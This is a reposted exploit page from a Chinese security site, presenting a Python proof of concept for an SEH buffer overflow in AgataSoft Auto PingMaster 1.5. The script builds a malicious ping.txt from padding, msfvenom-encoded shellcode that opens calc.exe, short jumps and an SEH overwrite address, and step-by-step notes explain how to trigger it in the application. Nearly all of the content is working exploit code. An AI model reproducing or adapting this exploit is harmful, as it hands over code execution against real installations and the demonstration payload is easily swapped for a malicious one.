首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
AgataSoft Auto PingMaster 1.5 - Buffer Overflow (SEH)
来源:@bzyo_ 作者:bzyo 发布时间:2018-08-10  

# Exploit Title: AgataSoft Auto PingMaster 1.5 - Buffer Overflow (SEH)
# Date: 2018-08-03
# Exploit Author: bzyo
# Twitter: @bzyo_
# Vulnerable Software: AgataSoft Auto PingMaster 1.5
# Vendor Homepage: http://agatasoft.com/
# Version: 1.5
# Software Link : http://agatasoft.com/Ping_Master.exe
# Tested Windows 7 SP1 x86

# PoC
# 1. generate ping.txt, copy contents to clipboard
# 2. open application
# 3. select Trace Route
# 4. paste contents from clipBoard to "Host name:" field
# 5. select "Get IP from host name"
# 6. pop calc

#!/usr/bin/python

# greetz Luis Martínez for find in ebd-id 45137
 
import struct

junk1 = "A"*100

#msfvenom -a x86 -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d\x0e" -e x86/alpha_mixed -f c
#Payload size: 448 bytes
calc = ("\x89\xe1\xd9\xf7\xd9\x71\xf4\x5b\x53\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x59\x6c\x5a\x48\x4c\x42\x77\x70\x53\x30\x45\x50\x35\x30\x6b"
"\x39\x58\x65\x70\x31\x39\x50\x30\x64\x4c\x4b\x50\x50\x64\x70"
"\x6e\x6b\x71\x42\x34\x4c\x4e\x6b\x71\x42\x37\x64\x6e\x6b\x62"
"\x52\x56\x48\x36\x6f\x4c\x77\x61\x5a\x64\x66\x56\x51\x49\x6f"
"\x6e\x4c\x45\x6c\x75\x31\x71\x6c\x53\x32\x66\x4c\x55\x70\x69"
"\x51\x38\x4f\x44\x4d\x47\x71\x6a\x67\x78\x62\x6a\x52\x31\x42"
"\x76\x37\x4e\x6b\x70\x52\x44\x50\x6e\x6b\x61\x5a\x47\x4c\x6c"
"\x4b\x30\x4c\x34\x51\x71\x68\x4b\x53\x63\x78\x77\x71\x4b\x61"
"\x63\x61\x4e\x6b\x63\x69\x35\x70\x56\x61\x4e\x33\x6e\x6b\x57"
"\x39\x65\x48\x68\x63\x44\x7a\x37\x39\x6c\x4b\x46\x54\x6c\x4b"
"\x47\x71\x7a\x76\x35\x61\x49\x6f\x4c\x6c\x7a\x61\x6a\x6f\x64"
"\x4d\x55\x51\x4b\x77\x57\x48\x6b\x50\x74\x35\x69\x66\x65\x53"
"\x31\x6d\x4a\x58\x77\x4b\x61\x6d\x51\x34\x61\x65\x6a\x44\x61"
"\x48\x4e\x6b\x62\x78\x45\x74\x47\x71\x79\x43\x71\x76\x4c\x4b"
"\x64\x4c\x72\x6b\x6c\x4b\x73\x68\x35\x4c\x43\x31\x6a\x73\x6e"
"\x6b\x37\x74\x6e\x6b\x37\x71\x4e\x30\x4f\x79\x52\x64\x35\x74"
"\x55\x74\x71\x4b\x51\x4b\x51\x71\x70\x59\x72\x7a\x53\x61\x6b"
"\x4f\x59\x70\x73\x6f\x63\x6f\x72\x7a\x4c\x4b\x56\x72\x48\x6b"
"\x6e\x6d\x31\x4d\x50\x6a\x55\x51\x6e\x6d\x4b\x35\x4f\x42\x73"
"\x30\x65\x50\x55\x50\x42\x70\x72\x48\x70\x31\x4e\x6b\x42\x4f"
"\x6c\x47\x6b\x4f\x4a\x75\x4d\x6b\x5a\x50\x48\x35\x6e\x42\x31"
"\x46\x62\x48\x39\x36\x5a\x35\x6f\x4d\x6d\x4d\x4b\x4f\x79\x45"
"\x45\x6c\x63\x36\x73\x4c\x45\x5a\x6b\x30\x59\x6b\x79\x70\x50"
"\x75\x55\x55\x6d\x6b\x43\x77\x42\x33\x61\x62\x62\x4f\x33\x5a"
"\x33\x30\x56\x33\x49\x6f\x49\x45\x43\x53\x53\x51\x72\x4c\x53"
"\x53\x44\x6e\x65\x35\x64\x38\x43\x55\x67\x70\x41\x41")

junk3 = "\xcc"*92

jmp3 = "\xe9\x7d\xfd\xff\xff\xcc"

junk2 = "\xcc"*20

jmp1 = "\xeb\xf8\xcc\xcc"

jmp2 = "\xeb\xe4\xcc\xcc\xcc\xcc"


seh = struct.pack('<L',0x00462360)

buffer = junk1 + calc + junk3 + jmp3 + junk2 + jmp2 + jmp1 + seh

with open("ping.txt","wb") as f:
    f.write(buffer[:-1])


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·HT Editor File openning Stack
  相关文章
·iSmartViewPro 1.5 Account Buff
·CloudMe Sync 1.10.9 - Buffer O
·iSmartViewPro 1.5 Device Alias
·reSIProcate 1.10.2 Heap Overfl
·QNap QVR Client 5.0.3.23100 -
·OpenEMR < 5.0.1 - Remote Code
·Wedding Slideshow Studio 1.36
·Fortinet FortiClient 5.2.3 (Wi
·Linux Kernel UDP Fragmentation
·Seq 4.2.476 Authentication Byp
·Linkedin iOS 9.11.8592.4 CPU R
·AgataSoft Auto PingMaster 1.5
  推荐广告
CopyRight © 2002-2018 VFocuS.Net All Rights Reserved